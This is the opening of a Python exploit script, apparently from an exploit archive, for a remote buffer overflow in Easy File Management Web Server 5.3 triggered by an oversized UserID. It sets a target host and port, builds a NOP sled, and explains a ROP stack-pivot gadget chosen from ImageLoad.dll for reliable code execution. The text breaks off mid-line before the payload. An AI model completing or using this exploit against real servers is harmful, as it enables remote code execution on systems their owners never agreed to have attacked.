#!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow (ROP) # Version: 5.3 # Date: 2014-05-31 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.efssoft.com/ # Tested on: WinXP-GER, Win7x64-GER, Win8-EN, Win8x64-GER # # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) # # Howto / Notes: # This scripts exploits the buffer overflow vulnerability caused by an oversized UserID - string as # discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not # brute force the address of the overwritten stackpart, instead it uses code from its own # .text segment to achieve reliable code execution. from struct import pack import socket,sys import os host="192.168.0.1" port=80 junk0 = "\x90" * 80 # Instead of bruteforcing the stack address, let's take an address # from the .text segment, which is near to the stackpivot instruction: # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('